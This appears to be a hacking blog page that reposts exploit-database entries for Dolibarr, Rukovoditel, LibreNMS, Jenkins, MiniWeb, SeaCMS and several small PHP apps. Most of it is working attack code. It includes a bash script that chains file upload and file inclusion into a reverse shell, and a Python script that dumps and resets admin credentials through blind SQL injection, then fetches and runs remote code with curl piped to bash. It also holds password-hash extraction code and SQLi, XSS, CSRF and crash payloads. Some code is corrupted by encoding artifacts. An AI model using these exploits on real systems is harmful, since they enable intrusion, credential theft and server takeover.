# Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged in username on header and select Manage Account.
Step 3: Rename the user First Name or Last Name to
"<script>alert(1111)</script>".
Step 4: Update Profile and this will trigger the XSS.
Step 5: Logout and login again and the page will display the domain name.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863143345
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection
# Date: 2020-12-11
# Exploit Author: Piyush Malviya
# Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4
#Vulnerable Page: Login Page
#Exploit
Open the Application
check the URL: http://localhost/scm-master/
Open Login Page
Enter username: ' or 0=0 #
Enter password: '
Select Login Type: Admin
click on login
The SQL payload gets executed and authentication is bypassed successfully
# Exploit Title: Rukovoditel 2.6.1 - RCE
# Date: 2020-06-11
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c1010
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# CVE: CVE-2020-11819
set -e
function usage () {
echo "NAME: Rukovoditel v2.6.1, RCE"
echo "SYNOPSIS: ./rce_2.6.1.sh <BASE_URL> <SID>"
echo "DESCRIPTION:"
echo "Upload file test.php on the remote server and trigger the file using a LFI"
echo "AUTHOR: coiffeur"
exit
}
if [ "$#" -ne 2 ]; then
usage
fi
BASE_URL=$1
SID=$2
echo "Setting target: $BASE_URL"
echo "Setting sid: $SID"
echo ""
echo "Extracting \$app_user['id']:"
APP_USER_ID=`curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID" | grep "validate_form&id=" | cut -d '=' -f 3 | cut -d "'" -f 1`
echo " => \$app_user['id']: $APP_USER_ID"
echo "Setting arbitrary \$_POST['timestamp']:"
TIMESTAMP=1337
echo " => \$_POST['timestamp']: 1337"
echo "Calculating \$verifyToken:"
VERIFY_TOKEN=`echo -n "$APP_USER_ID$TIMESTAMP" | md5sum | cut -d ' ' -f 1=`
echo " => \$verifyToken: $VERIFY_TOKEN"
echo ""
echo "[*] Trying to upload test.php ... (Arbitrary File Upload)"
curl "$BASE_URL/index.php?module=users/account&action=attachments_upload" -H "Cookie: sid=$SID" -F "timestamp=$TIMESTAMP" -F "token=$VERIFY_TOKEN" -F 'Filedata=@test.php'
echo ""
echo "[*] Trying to recover time() output:"
TIME=$(date -d "`curl -si "$BASE_URL" | grep "Date:" | sed 's/Date: //'`"= +%s)
echo " => timestamp: $TIME"
echo "[*] Trying to recover the generated filename:"=20
FILENAME=` echo -n $TIME"_test.php" | sha1sum | cut -d ' ' -f 1`
echo " => filename: $FILENAME"
echo "[*] Trying to reconstructing full path:"
DATE=`date +"%Y/%m/%d"`
FULL_PATH=`echo -n "uploads/attachments/$DATE/$FILENAME"`
echo " => full path: $FULL_PATH"
echo ""
echo "[!] Prepare a netcat listener by typing: nc -lvp 4444"
echo ""
echo "[*] Trying to update language settings ... (Local File Inclusion)"
LANGUAGE="../../$FULL_PATH"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=$LANGUAGE"
echo "[*] Triggering reverse shell ..."
curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID="
echo "[*] Restoring default language settings"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=english.php"
echo "> Done"
# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE
# Date: 2/12/2020
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
# Version: 12.0.3
import argparse
import binascii
import random
import re
from io import BytesIO
from urllib.parse import quote_plus as qp
import bcrypt
import pytesseract
import requests
from bs4 import BeautifulSoup
from PIL import Image
DELTA = None
DEBUG = 1
SESSION = requests.session()
TRESHOLD = 0.80
DELAY = 1
LIKE = "%_subscription"
COLUMNS = ["login", "pass_temp"]
def usage():
banner = """NAME: Dolibarr SQLi to RCE (authenticate)
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PAS=
SWORD>
EXAMPLE:
python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12=
.0.3/htdocs/" -u test -p test
AUTHOR: coiffeur
"""
print(banner)
exit(-1)
def hex(text):
return "0x" + binascii.hexlify(text.encode()).decode()
def hash(password):
salt = bcrypt.gensalt()
hashed = bcrypt.hashpw(password.encode(), salt)
return hashed.decode()
def authenticate(url, username, password):
datas = {
"actionlogin": "login",
"loginfunction": "loginfunction",
"username": username,
"password": password
}
r = SESSION.post(f"{url}index.php", data=datas,
allow_redirects=False, verify=False)
if r.status_code != 302:
if DEBUG:
print(f"[x] Authentication failed!")
return 0
if DEBUG:
print(f" [*] Authenticated as: {username}")
return 1
def get_antispam_code(base_url):
code = ""
while len(code) != 5:
r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
temp_image = f"/tmp/{random.randint(0000,9999)}"
with open(temp_image, "wb") as f:
f.write(r.content)
with open(temp_image, "rb") as f:
code = pytesseract.image_to_string(
Image.open(BytesIO(f.read()))).split("\n")[0]
for char in code:
if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679":
code = ""
break
return code
def reset_password(url, login):
for _ in range(5):
code = get_antispam_code(url)
headers = {
"Referer": f"{url}user/passwordforgotten.php"
}
datas = {
"action": "buildnewpassword",
"username": login,
"code": code
}
r = SESSION.post(url=f"{url}user/passwordforgotten.php",
data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in [f"Request to change password for {login} sent =
to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]:
if r.text.find(response):
if DEBUG:
print(f" [*] Password reset using code: {code}")
return 1
return 0
def change_password(url, login, pass_temp):
r = requests.get(url=f"{url}user/passwordforgotten.php?action=val=
idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",
allow_redirects=False, verify=False)
if r.status_code == 302:
if DEBUG:
print(f" [*] Password changed: {pass_temp}")
return 1
return 0
def change_binary(url, command, parameters):
headers = {
"Referer": f"{url}admin/security_file.php"
}
datas = {
"action": "updateform",
"MAIN_UPLOAD_DOC": "2048",
"MAIN_UMASK": "0664",
"MAIN_ANTIVIRUS_COMMAND": command,
"MAIN_ANTIVIRUS_PARAM": parameters
}
r = SESSION.post(url=f"{url}admin/security_file.php",
data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in ["Record modified successfully", "Enregistrement mo=
difi=C3=A9 avec succ=C3=A8s"]:
if response in r.text:
if DEBUG:
print(f" [*] Binary's path changed")
return 1
return 0
def trigger_exploit(url):
headers = {
"Referer": f"{url}admin/security_file.php"
}
files = {
"userfile[]": open("junk.txt", "rb"),
}
datas = {
"sendit": "Upload"
}
if DEBUG:
print(f" [*] Triggering reverse shell")
r = SESSION.post(url=f"{url}admin/security_file.php",
files=files, data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in ["File(s) uploaded successfully", "The antivirus pr=
ogram was not able to validate the file (file might be infected by a virus)=
", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus=
n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir=
us) !"]:
if response in r.text:
if DEBUG:
print(f" [*] Exploit done")
return 1
return 0
def get_version(url):
r = SESSION.get(f"{url}index.php", verify=False)
x = re.findall(
r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text)
if x:
version = x[0]
if "12.0.3" in version:
if DEBUG:
print(f" [*] {version} (exploit should work)")
return 1
if DEBUG:
print(f"[*] Version may not be vulnerable")
return 0
def get_privileges(url):
r = SESSION.get(f"{url}index.php", verify=False)
x = re.findall(r"id=\d", r.text)
if x:
id = x[0]
if DEBUG:
print(f" [*] id found: {id}")
r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
for img in soup.find_all("img"):
if img.get("title") in ["Actif", "Active"]:
for td in img.parent.parent.find_all("td"):
privileges = [
"Consulter les commandes clients", "Read customers =
orders"]
for privilege in privileges:
if privilege in td:
if DEBUG:
print(
f" [*] Check privileges: {privilege}=
")
return 1
if DEBUG:
print(f"[*] At the sight of the privileges, the exploit may fail")
return 0
def check(url, payload):
headers = {
"Referer": f"{url}commande/stats/index.php?leftmenu=orders"
}
datas = {"object_status": payload}
r = SESSION.post(url=f"{url}commande/stats/index.php",
data=datas, headers=headers, verify=False)
return r.elapsed.total_seconds()
def evaluate_delay(url):
global DELTA
deltas = []
payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
for _ in range(4):
deltas.append(check(url, payload))
DELTA = sum(deltas)/len(deltas)
if DEBUG:
print(f" [+] Delta: {DELTA}")
def get_tbl_name_len(url):
i = 0
while 1:
payload = f"IF((SELECT LENGTH(table_name) FROM information_schema=
.tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"
if check(url, payload) >= DELTA*TRESHOLD:
return i
if i > 100:
print(f"[x] Exploit failed")
exit(-1)
i += 1
def get_tbl_name(url, length):
tbl_name = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i=
nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP=
({DELAY}), SLEEP(0))"
if check(url, payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
tbl_name += chr(min)
return tbl_name
def get_elt_len(url, tbl_name, column_name):
i = 0
while 1:
payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI=
T 1)>{i}, SLEEP(0), SLEEP({DELAY}))"
if check(url, payload) >= DELTA*TRESHOLD:
return i
if i > 100:
print(f"[x] Exploit failed")
exit(-1)
i += 1
def get_elt(url, tbl_name, column_name, length):
elt = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO=
M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"
if check(url, payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
elt += chr(min)
return elt
def get_row(url, tbl_name):
print(f" [*] Dump admin's infos from {tbl_name}")
infos = {}
for column_name in COLUMNS:
elt_length = get_elt_len(url, tbl_name, column_name)
infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng=
th)
if DEBUG:
print(f" [+] Infos: {infos}")
return infos
def main(url, username, password):
# Check if exploit is possible
print(f"[*] Requirements:")
if not authenticate(url, username, password):
print(f"[x] Exploit failed!")
exit(-1)
get_version(url)
get_privileges(url)
print(f"\n[*] Starting exploit:")
# Evaluate delay
evaluate_delay(url)
print(f" [*] Extract prefix (using table: {LIKE})")
tbl_name_len = get_tbl_name_len(url)
tbl_name = get_tbl_name(url, tbl_name_len)
prefix = f"{tbl_name.split('_')[0]}_"
if DEBUG:
print(f" [+] Prefix: {prefix}")
# Dump admin's infos
user_table_name = f"{prefix}user"
infos = get_row(url, user_table_name)
if not infos["login"]:
print(f"[x] Exploit failed!")
exit(-1)
# Reset admin's passworrd
if DEBUG:
print(f" [*] Reseting {infos['login']}'s password")
if not reset_password(url, infos["login"]):
print(f"[x] Exploit failed!")
exit(-1)
infos = get_row(url, user_table_name)
# Remove cookies to logout
# Change admin's password
# Login as admin
SESSION.cookies.clear()
if not change_password(url, infos['login'], infos['pass_temp']):
print(f"[x] Exploit failed!")
exit(-1)
authenticate(url, infos['login'], infos['pass_temp'])
# Change antivirus's binary path
# Trigger reverse shell
change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"'=
)
trigger_exploit(url)
return 0
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-t", help="Base URL of Dolibarr")
parser.add_argument("-u", help="Username")
parser.add_argument("-p", help="Password")
args = parser.parse_args()
if not args.t or not args.u or not args.p:
usage()
main(args.t, args.u, args.p)
# Exploit Title: Courier Management System 1.0 - 'MULTIPART street ' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page in burpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents
---
Parameter: MULTIPART street ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="id"
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="street"
11111111111' AND (SELECT 8687 FROM (SELECT(SLEEP(5)))XZFt) AND 'OQNu'='OQNu
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="city"
111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="state"
1111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="zip_code"
11111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="country"
1111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="contact"
111111111
-----------------------------12317926718649295872939507245--
---
# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
# Google Dork: Unknown
# Date: 13-12-2020
# Exploit Author: Hodorsec
# Vendor Homepage: https://www.librenms.org
# Software Link: https://github.com/librenms/librenms
# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
# Version: 1.46
# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
# CVE : N/A
#!/usr/bin/python3
# EXAMPLE:
# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
# [*] Checking if authentication for page is required...
# [*] Visiting page to retrieve initial token and cookies...
# [*] Retrieving authenticated cookie...
# [*] Printing number of rows in table...
# 1
# [*] Found 1 rows of data in table 'users'
#
# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
# [*] Extracting strings from row 1...
# librenms
# [*] Retrieved value 'librenKs' for column 'username' in row 1
# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
# [*] Extracting strings from row 1...
# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
#
# [+] Done!
import requests
import urllib3
import os
import sys
import re
from bs4 import BeautifulSoup
# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy
# Disable cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Set timeout
timeout = 10
# Injection prefix and suffix
inj_prefix = "(select(sleep("
inj_suffix = ")))))"
# Decimal begin and end
dec_begin = 48
dec_end = 57
# ASCII char begin and end
ascii_begin = 32
ascii_end = 126
# Handle CTRL-C
def keyboard_interrupt():
"""Handles keyboardinterrupt exceptions"""
print("\n\n[*] User requested an interrupt, exiting...")
exit(0)
# Custom headers
def http_headers():
headers = {
'User-Agent': 'Mozilla',
}
return headers
def check_auth(url,headers):
print("[*] Checking if authentication for page is required...")
target = url + "/graph.php"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
if "Unauthorized" in r.text:
return True
else:
return False
def get_initial_token_and_cookies(url,headers):
print("[*] Visiting page to retrieve initial token and cookies...")
target = url + "/login"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
soup = BeautifulSoup(r.text,'html.parser')
for n in soup('input'):
if n['name'] == "_token":
token = n['value']
return token,r.cookies
else:
return None,r.cookies
def get_valid_cookie(url,headers,token,cookies,usern,passw):
print("[*] Retrieving authenticated cookie...")
appl_cookie = "laravel_session"
post_data = {'_token':token,
'username':usern,
'password':passw,
'submit':''}
target = url + "/login"
r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False)
res = r.text
if "Overview | LibreNMS" in res:
return r.cookies
else:
print("[!] No valid response from used session, exiting!\n")
exit(-1)
# Perform the SQLi call for injection
def sqli(url,headers,cookies,inj_str,sleep):
comment_inj_str = re.sub(" ","/**/",inj_str)
inj_params = {'id':'1',
'stat':'none',
'type':'port_mac_acc_total',
'sort':comment_inj_str,
'debug':'1'}
inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())
# Do GET request
r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False)
res = r.elapsed.total_seconds()
if res >= sleep:
return True
elif res < sleep:
return False
else:
print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
exit(-1)
# Extract rows
def get_rows(url,headers,cookies,table,sleep):
rows = ""
max_pos_rows = 4
# Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
for pos in range(1,max_pos_rows+1):
# Test if current pos does have any valid value. If not, break
direction = ">"
inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
if not sqli(url,headers,cookies,inj_str,sleep):
break
# Loop decimals
direction = "="
for num_rows in range(dec_begin,dec_end+1):
row_char = chr(num_rows)
inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
if sqli(url,headers,cookies,inj_str,sleep):
rows += row_char
print(row_char,end='',flush=True)
break
if rows != "":
print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
return int(rows)
else:
return False
# Loop through positions and characters
def get_data(url,headers,cookies,row,column,table,sleep):
extracted = ""
max_pos_len = 50
# Loop through length of string
# Not very efficient, should use a guessing algorithm
print("[*] Extracting strings from row " + str(row+1) + "...")
for pos in range(1,max_pos_len):
# Test if current pos does have any valid value. If not, break
direction = ">"
inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
if not sqli(url,headers,cookies,inj_str,sleep):
break
# Loop through ASCII printable characters
direction = "="
for guess in range(ascii_begin,ascii_end+1):
extracted_char = chr(guess)
inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
if sqli(url,headers,cookies,inj_str,sleep):
extracted += chr(guess)
print(extracted_char,end='',flush=True)
break
return extracted
# Main
def main(argv):
if len(sys.argv) == 5:
usern = sys.argv[1]
passw = sys.argv[2]
url = sys.argv[3]
sleep = int(sys.argv[4])
else:
print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
exit(0)
# Random headers
headers = http_headers()
# Do stuff
try:
# Get a valid initial token and cookies
token,cookies = get_initial_token_and_cookies(url,headers)
# Check if authentication is required
auth_required = check_auth(url,headers)
if auth_required:
# Get an authenticated session cookie using credentials
valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw)
else:
valid_cookies = cookies
print("[+] Authentication not required, continue without authentication...")
# Setting the correct vulnerable page
url = url + "/graph.php"
# The columns to retrieve
columns = ['username','password']
# The table to retrieve data from
table = "users"
# Getting rows
print("[*] Printing number of rows in table...")
rows = get_rows(url,headers,valid_cookies,table,sleep)
if not rows:
print("[!] Unable to retrieve rows, checks requests.\n")
exit(-1)
# Getting values for found rows in specified columns
for column in columns:
print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
for row in range(0,rows):
# rowval_len = get_length(url,headers,row,column,table)
retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep)
print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1))
# Done
print("\n[+] Done!\n")
except requests.exceptions.Timeout:
print("[!] Timeout error\n")
exit(-1)
except requests.exceptions.TooManyRedirects:
print("[!] Too many redirects\n")
exit(-1)
except requests.exceptions.ConnectionError:
print("[!] Not able to connect to URL\n")
exit(-1)
except requests.exceptions.RequestException as e:
print("[!] " + str(e))
exit(-1)
except requests.exceptions.HTTPError as e:
print("[!] Failed with error code - " + str(e.code) + "\n")
exit(-1)
except KeyboardInterrupt:
keyboard_interrupt()
exit(-1)
# If we were called as a program, go execute the main function.
if __name__ == "__main__":
main(sys.argv[1:])
# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change
password)
# Date: 2020-12-14
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# Tested on: Kali Linux
POC(localhost/index.php?module=users/change_password):
<html>
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '/')</script>
<form
action="https://localhost/index.php?module=users/change_password&action=change"
method="POST">
<input type="hidden" name="form_session_token"
value="D^HUyTDh0X" />
<input type="hidden" name="password_new" value="123456789" />
<input type="hidden" name="password_confirmation"
value="123456789" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
--
# Exploit Title: Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2231
# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
https://www.openwall.com/lists/oss-security/2020/08/12/4
Vendor Description:
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely'.
This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token.
Jenkins 2.252, LTS 2.235.4 escapes the remote address of the host.
Technical Details and Exploitation:
When a build of a project is completed, Jenkins returns a message in completed build process. Build process is present in build history view.
The message reflects the username, for example "Started by user gx1".
Anyway, when 'Trigger builds remotely feature' is enabled, instead of the username the remote client IP is reflected, i.e.:
Started by remote host '<client-ip-address>'.
To understand how remote build trigger works, have a look at this post: https://narenchejara.medium.com/trigger-jenkins-job-remotely-using-jenkins-api-20973618a493
The message "Starte by remote <client-ip-address> is not escaped. This could seem without security issues because the user cannot change the remote IP, right? This is not completely true... when the application server is behind a proxy, "remote client IP" is not available, as the request comes from the proxy.
In these cases, X-Headers are used to allow the application server to understand the real client information. A common header is X-Forwarded-For: X-Forwarded-For HTTP header is inserted by load balancers into the data stream to identify the address of the connecting client system.
To exploit the vulnerability the attacker requires several conditions:
- Remote build should be enabled and if needed the attackers should have obtained API authentication token or should have Job/Configure permission
- Application server that hosts Jenkins should use some X-Header to override client IP. This happens often, because usually the application server is under proxy, and in order to obtain client IP, override mechanisms are used.
For example, in Apache Tomcat, it is possible to configure X-Forwarded-For heaer processing, as described in https://dacurry-tns.github.io/deploying-apereo-cas/setup_tomcat_configure-xforwardedfor-header-processing.html.
Proof Of Concept:
1. Identify the X-Header that is used by the Application Server to override proxy ip. Let's suppose that "X-Forwarded-For" is used. In this condition, the attacker can inject malicious payloads in "X-Forwarded-For" header value to exploit the vulnerability;
2. Send the following request:
GET /job/<project_name>/build?token=<token> HTTP/1.1
Host: <jenkins_host>:8080
X-Forwarded-For: gx1<script>alert(1);</script>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=88DD2A6297E0E0FE9A59B310CA271715; screenResolution=1220x686
Connection: close
HTTP/1.1 201
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Location: http://<vulnenv>:8080/jenkins/queue/item/7/
Content-Length: 0
Date: Fri, 11 Dec 2020 17:04:06 GMT
Connection: close
<project_name> is the project that can be remotely built by using <token>.
3. To trigger the XSS, navigate the build item present in the build history when the build is finished. For example, if the build current finished process is #16, stored XSS is present in
http://<jenkins_host>/job/<project_name>/16/
Solution:
The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4
# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page inburpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents
---
Parameter: ref_no (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND
'knst'='knst
---
# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
# Date: 13.12.2020
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://sourceforge.net/projects/miniweb/
# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
# Version: 0.8.19
# Tested on: Win7 x86
# Researchers: Security For Everyone Team - https://securityforeveryone.com
'''
Description
MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
first parameter in a POST request.
Exploitation
The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1¶m_name2=param_data2
if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.
About Security For Everyone Team
We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list
'''
#!/usr/bin/python
import socket
import sys
import struct
if len(sys.argv) != 2 :
print "[+] Usage : python exploit.py [VICTIM_IP]"
exit(0)
TCP_IP = sys.argv[1]
TCP_PORT = 8000
xx = "A"*2038 #4085
http_req = "POST /index.html HTTP/1.1\r\n"
http_req += "Host: 192.168.231.140\r\n"
http_req += "From: header-data\r\n"
http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
http_req += xx + "=param_data1¶m_name2=param_data2"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
s.send(http_req)
s.close()
# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1
POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
